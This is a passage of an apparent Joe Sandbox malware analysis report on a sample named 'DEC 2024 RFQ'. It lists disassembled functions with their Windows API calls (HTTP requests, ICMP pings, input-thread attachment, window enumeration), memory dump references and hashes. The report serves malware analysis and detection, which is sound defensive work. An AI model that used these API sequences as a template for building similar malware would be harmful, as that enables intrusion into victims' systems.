                                                                                                                      • CoInitialize.OLE32 ref: 00098403
                                                                                                                      • CoUninitialize.OLE32 ref: 0009840E
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,000B2BEC,?), ref: 0009846E
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 000984E1
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0009857B
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000985DC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: 82949cd14ac99527fdf3ee53fe8abbd00d05744601d63b5e811d21fe82c86afe
                                                                                                                      • Instruction ID: fe3da5394be4c3d1c3790e194bfeef456d05c382c23bfd95ce3e4cca8285c39c
                                                                                                                      • Opcode Fuzzy Hash: 82949cd14ac99527fdf3ee53fe8abbd00d05744601d63b5e811d21fe82c86afe
                                                                                                                      • Instruction Fuzzy Hash: 3661BE706087129FDB10DF64C848FAEB7E8AF4A754F048419F9859B3A1CB74ED48DB92
                                                                                                                      Function 00095732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00095793
                                                                                                                      • inet_addr.WSOCK32(?,?,?), ref: 000957D8
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 000957E4
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 000957F2
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00095862
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00095878
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 000958ED
                                                                                                                      • WSACleanup.WSOCK32 ref: 000958F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 1e0d9dcac45a1de262935077d72a46eb45645bf19cb629f7f60cf966b169a9dd
                                                                                                                      • Instruction ID: b75f95e162a665a3c562588fa0d94afe5fbe6b6d2c93ae8e72a09ae2a8caa23f
                                                                                                                      • Opcode Fuzzy Hash: 1e0d9dcac45a1de262935077d72a46eb45645bf19cb629f7f60cf966b169a9dd
                                                                                                                      • Instruction Fuzzy Hash: 9851C131604B01DFEB21EF65DC45B6AB7E4EF45711F048929F996EB2A1DB30E800EB51
                                                                                                                      Function 0008B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008B4D0
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0008B546
                                                                                                                      • GetLastError.KERNEL32 ref: 0008B550
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0008B5BD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: c981b644df018fd04182b5b0a4e744bce285b15e5995f86b0b4abcb64dc140f8
                                                                                                                      • Instruction ID: aff509f6adad527067d0efdb9537ca12ce3eb5bd8975b17a0ca7b9f69b0a061f
                                                                                                                      • Opcode Fuzzy Hash: c981b644df018fd04182b5b0a4e744bce285b15e5995f86b0b4abcb64dc140f8
                                                                                                                      • Instruction Fuzzy Hash: DD31A135A00605DFDB20FB68D845FBE7BB4FF09310F108126E645DB292DB709A41CB91
                                                                                                                      Function 00078F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00079014
                                                                                                                      • GetDlgCtrlID.USER32 ref: 0007901F
                                                                                                                      • GetParent.USER32 ref: 0007903B
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0007903E
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00079047
                                                                                                                      • GetParent.USER32(?), ref: 00079063
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00079066
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: d11fdafa4f7ef3cb94255cb9f81b4134ade5376bda373b175823a31cde5938d9
                                                                                                                      • Instruction ID: 6ab239c37615e3cc53d3640515735c14b8fcc278bfcdf2b9d4a6b1eb5d056e50
                                                                                                                      • Opcode Fuzzy Hash: d11fdafa4f7ef3cb94255cb9f81b4134ade5376bda373b175823a31cde5938d9
                                                                                                                      • Instruction Fuzzy Hash: 0D21C170E00209BFDF14ABA0CC85EFEBBB8EF4A310F104116F925972A2DB795815DB64
                                                                                                                      Function 0007907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000790FD
                                                                                                                      • GetDlgCtrlID.USER32 ref: 00079108
                                                                                                                      • GetParent.USER32 ref: 00079124
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00079127
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00079130
                                                                                                                      • GetParent.USER32(?), ref: 0007914C
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0007914F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: 9e7703aee35dc08d3c387cf736ff8c4d35ec722bb2744976ce9b799021721d8f
                                                                                                                      • Instruction ID: 6d452dfe218daea47493f1b85f5a7d8d575247e4cc8a064167c37a9b81d8acac
                                                                                                                      • Opcode Fuzzy Hash: 9e7703aee35dc08d3c387cf736ff8c4d35ec722bb2744976ce9b799021721d8f
                                                                                                                      • Instruction Fuzzy Hash: F0212974E00209BFDF10ABA0CC85EFEBBB8EF45300F004016F915972A2DB795825DB64
                                                                                                                      Function 00079163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 0007916F
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00079184
                                                                                                                      • _wcscmp.LIBCMT ref: 00079196
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00079211
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: 79ae5ccd51baba624810ecd212f481aaf87481f7dc898c7ac3d1d83c274661a6
                                                                                                                      • Instruction ID: 45002968cd0cf99bc9dadd897aa2a56afec3e666f97bbe1479e6d1c4a2fc4984
                                                                                                                      • Opcode Fuzzy Hash: 79ae5ccd51baba624810ecd212f481aaf87481f7dc898c7ac3d1d83c274661a6
                                                                                                                      • Instruction Fuzzy Hash: 27110A77688307BAFA213624DC16DE7779C9B15720B204027FA08E41D3FE659852559C
                                                                                                                      Function 000988AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000988D7
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00098904
                                                                                                                      • CoUninitialize.OLE32 ref: 0009890E
                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00098A0E
                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00098B3B
                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,000B2C0C), ref: 00098B6F
                                                                                                                      • CoGetObject.OLE32(?,00000000,000B2C0C,?), ref: 00098B92
                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00098BA5
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00098C25
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00098C35
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2395222682-0
                                                                                                                      • Opcode ID: 475028138b9016294f0ae633ffebd2f529521457e07483ee8fb27c1134fecd11
                                                                                                                      • Instruction ID: 88e9b85f05fdf62119beda88c3aa321027f325f6c68dfcf5376ca9ff41b8ea77
                                                                                                                      • Opcode Fuzzy Hash: 475028138b9016294f0ae633ffebd2f529521457e07483ee8fb27c1134fecd11
                                                                                                                      • Instruction Fuzzy Hash: 10C125B1608305AFDB00DF64C88496BB7E9FF8A348F04895DF98A9B251DB71ED05CB52
                                                                                                                      Function 00087990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00087A6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      • Opcode ID: 04c659fe03eab09d6d0514614d92b214608a1c92451892916d80a0c596a8c794
                                                                                                                      • Instruction ID: 4e0fc791bb3a3b13189b93b143002debf377256609627a25f2ae69e409a47116
                                                                                                                      • Opcode Fuzzy Hash: 04c659fe03eab09d6d0514614d92b214608a1c92451892916d80a0c596a8c794
                                                                                                                      • Instruction Fuzzy Hash: DFB18C7190421A9FDB10EFA4C884BFEBBF5FF49321F244429E689A7256D734E941CB90
                                                                                                                      Function 000811CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000811F0
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00080268,?,00000001), ref: 00081204
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0008120B
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 0008121A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0008122C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 00081245
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00080268,?,00000001), ref: 00081257
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 0008129C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 000812B1
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00080268,?,00000001), ref: 000812BC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: ffdf121a980c4344bb93c03eecca6687d02bc12dcd7823f48fc527e6935e83a8
                                                                                                                      • Instruction ID: 8a8ed6f42bef9c0d19fb86804ab88c2686dc79304e80afdaa767417befe526ef
                                                                                                                      • Opcode Fuzzy Hash: ffdf121a980c4344bb93c03eecca6687d02bc12dcd7823f48fc527e6935e83a8
                                                                                                                      • Instruction Fuzzy Hash: 3F31DD75600204FBEBA0AF90FC88FB937EDBF657A1F104125F840EA1A1D3B99D418B60
                                                                                                                      Function 0002FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0002FAA6
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0002FB45
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0002FC9C
                                                                                                                      • DestroyWindow.USER32(?), ref: 000645D6
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0006463B
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00064668
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: f974c60f220c8ed65b0222456a3e10ba21fe0405ea2c0bae0da5f854f658833c
                                                                                                                      • Instruction ID: b68128da976714371dd8f0e62de40273c4971fc5c5647ca18530801d7c66573a
                                                                                                                      • Opcode Fuzzy Hash: f974c60f220c8ed65b0222456a3e10ba21fe0405ea2c0bae0da5f854f658833c
                                                                                                                      • Instruction Fuzzy Hash: 4DA19C70701222CFDB69EF14D995AB9F3A5BF05740F5442BDE80AAB262CB30AD16CF51
                                                                                                                      Function 0007A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,0007A439), ref: 0007A377
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: f71bd57bc31380ea0d70990a6e93a400c37f30dd3cd4a425b74fe7b282d6ece1
                                                                                                                      • Instruction ID: 2c25dc6cbbcbb1fba04bdf281cb7e066b5a3334a0e3f727d600af13ff3943809
                                                                                                                      • Opcode Fuzzy Hash: f71bd57bc31380ea0d70990a6e93a400c37f30dd3cd4a425b74fe7b282d6ece1
                                                                                                                      • Instruction Fuzzy Hash: 2891F671B00606AACB48DFA4C451BEDFBB4BF45310F50C129E44DA3252DF356A99CBE9
                                                                                                                      Function 00022E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00022EAE
                                                                                                                        • Part of subcall function 00021DB3: GetClientRect.USER32(?,?), ref: 00021DDC
                                                                                                                        • Part of subcall function 00021DB3: GetWindowRect.USER32(?,?), ref: 00021E1D
                                                                                                                        • Part of subcall function 00021DB3: ScreenToClient.USER32(?,?), ref: 00021E45
                                                                                                                      • GetDC.USER32 ref: 0005CD32
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0005CD45
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0005CD53
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0005CD68
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0005CD70
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0005CDFB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: d96c5e68b425d4b3a0c39382aa53212dff29a12e37e48fe18f768ebcbdcd990f
                                                                                                                      • Instruction ID: 0772cfc49e034a4c398a379a689b549be1488417b9ddf7257625e5766159d36a
                                                                                                                      • Opcode Fuzzy Hash: d96c5e68b425d4b3a0c39382aa53212dff29a12e37e48fe18f768ebcbdcd990f
                                                                                                                      • Instruction Fuzzy Hash: F871BD31400205EFEF618FA4DC80EEB7BB5FF49326F14466AED559A2A6C7348C84DB60
                                                                                                                      Function 00091A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00091A50
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00091A7C
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00091ABE
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00091AD3
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00091AE0
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00091B10
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00091B57
                                                                                                                        • Part of subcall function 00092483: GetLastError.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 00092498
                                                                                                                        • Part of subcall function 00092483: SetEvent.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 000924AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
